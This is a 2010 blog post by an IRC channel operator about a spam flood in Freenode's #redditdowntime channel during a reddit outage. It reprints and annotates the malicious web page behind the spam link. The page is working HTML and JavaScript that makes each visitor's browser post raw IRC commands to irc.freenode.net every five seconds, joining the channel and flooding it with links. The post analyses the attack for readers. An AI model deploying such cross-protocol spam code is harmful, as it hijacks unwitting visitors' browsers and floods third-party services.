Using a browser to piss off IRC users, or, spamming #redditdowntime

27 Jan 2010
Posted by R. Tyler Ballance

One of my most favorite sites on the internet, reddit, took some downtime this evening while doing some infrastructure (both hardware and software) upgrades. On their down-page, the reddit team invited everybody to join the #redditdowntime channel on the Freenode network, ostensibly to help users pass the time waiting for their pics and IAMAs to come back online.

Shortly after reddit started their scheduled outage, I joined the channel to pass the time while I debated what I should do with my evening. Within minutes the channel was flooded with a number of users, varying between spouting reddit memes in caps. link-spamming or engaging in casual chit-chat. I complained to one of the ops and fairly well-known-to-redditors employee: jedberg about the lack of moderation and he nearly instantly gave me +o (ops) in the channel. Not one to take my ops duty lightly, I started kicking spammers, warning habitual caps-lock users and tried to keep things generally civil through the deluge of messages consuming the channel.

Towards the end of the scheduled outage, some automated link-spamming started to appear and once it started it triggered more and more link-spamming. Clearly whatever was behind the bit.ly link was responsible for the self-propagating nature of the spamming. While the other moderators and myself tried to keep up with banning people I used wget to fetch the destination of the clearly malicious bit.ly URL to determine what we were dealing with. What I found is one of the more clever bits of JavaScript I think I've seen in recent months.

After bringing the site back up for a few minutes, reddit had to take it back down after noticing some problems with the upgrade, so another flood of users filled into the #redditdowntime channel and the link-spamming got worse. The most interesting aspect of the JavaScript in the code snippet below is how simple it is, I've commented it up a bit to help explain what's actually going on:

  1. <iframe id="y" name="y" style="display:none"></iframe>
  2.  
  3. <form method="post" target="y" action="http://irc.freenode.net:6667/" enctype="text/plain" id="f" style="display:none">
  4. <textarea name="x" id="x"></textarea>
  5. </form>
  6.  
  7. <script type="text/javascript">
  8. /*
  9.   * Generate a random string of characters to use for an IRC nick
  10.   */
  11. function rnd(){
  12. var chars="abcdefghijklmnopqrstuvwxyz";
  13. var r='';
  14. var length=Math.floor(Math.random()*10+3);
  15. for (var i=0;i<length;i++){
  16. var rnum=Math.floor(Math.random() * chars.length);
  17. r += chars.substring(rnum, rnum+1);
  18. }
  19. return r;
  20. }
  21. function lol(){
  22. /* Grab a reference to the textarea */
  23. var x = document.getElementById('x');
  24. /* Grab a reference to the form itself */
  25. var f = document.getElementById('f');
  26. /* Generate a fake user-name */
  27. var i = rnd();
  28. /* Generate a fake nick */
  29. var n = rnd();
  30.  
  31. /*
  32.   * Build a series of IRC commands into a string:
  33.   * - Set the username
  34.   * - Set the nick
  35.   * - Join the channel to spam (#redditdowntime)
  36.   * - Queue up a bunch of PRIVMSG commands to the channel with the spam link
  37.   */
  38. x.value='\r\nUSER '+i+' 8 * :'+n+'\r\nNICK '+n+'\r\nJOIN #redditdowntime\r\n'+new Array(99).join('PRIVMSG #redditdowntime :http://bit.ly/lolreddit\r\n')+'';
  39.  
  40. /* Submit the form, effectively sending the textarea contents to an IRC server */
  41. f.submit();
  42.  
  43. /* Setup a loop for maximum irritation */
  44. setTimeout(lol, 5000);
  45. }
  46. lol();
  47. </script>
  48. <h1>DIGG ROOLZ! REDDIT DROOLZ!</h1>